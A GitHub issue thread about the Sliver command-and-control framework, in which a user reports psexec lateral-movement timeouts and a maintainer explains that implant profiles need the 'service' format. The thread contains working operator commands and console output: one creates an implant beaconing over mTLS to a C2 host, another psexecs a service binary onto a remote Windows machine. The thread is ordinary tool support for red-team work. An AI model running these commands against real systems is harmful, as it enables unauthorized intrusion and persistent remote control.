### ISSUE TITLE
Psexec Service timeouts crash shell

### ISSUE THREAD

**Issue by Hestat** [BishopFox/sliver#232]
**Describe the bug**
Using the psexec lateral movement feature terminates with service timeout.

**To Reproduce**
Start session on host 1, launch lateral movement with psexec module.
File is uploaded successfully to host2
Service is created
Shell 2 successfully reaches out to C2
Service start times out and terminates process

**Expected behavior**
service should start successfully or at least existing shell shouldn't terminate

**Screenshots**

**Desktop (please complete the following information):**
 - OS: [e.g. MacOS]
C2 Kali, Targets Windows 10 1903/1909 and Server 2016
 - Version [e.g. v0.0.5]
Version 1.06

**Additional context**
Error message:

sliver (TESTING_PROPOSAL) > psexec -d DomainTest2 -s DomainTest2 -t 120 -p test1 DESKTOP-TARGET

[*] Sliver name for profile: PROPOSED_TESTING
[*] Uploaded service binary to \\DESKTOP-TARGET\C$\windows\temp\Xe9zL5bFCC.exe
[*] Session #5 PROPOSED_TESTING - 192.168.100.100:49185 (DESKTOP-TARGET) - windows/amd64 - Wed, 05 Aug 2020 19:59:34 EDT

[!] Error: rpc error: code = Unknown desc = The service did not respond to the start or control request in a timely fashion.

**Comment by Hestat** [comment]
looks like after some updates on the targets the shell no longer dies after the timeout, so that works well enough to get the job done.

**Comment by rkervella** [comment]
Weird, I'll have a look.

**Comment by rkervella** [comment]
Could you please share the complete commands you typed to create the `test1` profile?
I suspect you used the wrong format (default one is `exe`), which could explain the behavior.

I'm not blaming you here, I just realized I haven't documented the fact that the `service` format exists anywhere in the help or docs. I'll push a fix in a few.

**Comment by Hestat** [comment]
this would be what was used to create the profile, with domain changed for opsec and all that

new-profile --name test1 --mtls test.example.com -r exe

**Comment by rkervella** [comment]
Alright, makes sense. Try again with:

```
new-profile --format service --name blah --mtls test.example.com
...
psexec --profile blah --service blah --description blah TARGET
```

**Comment by rkervella** [comment]
Docs should be there now.
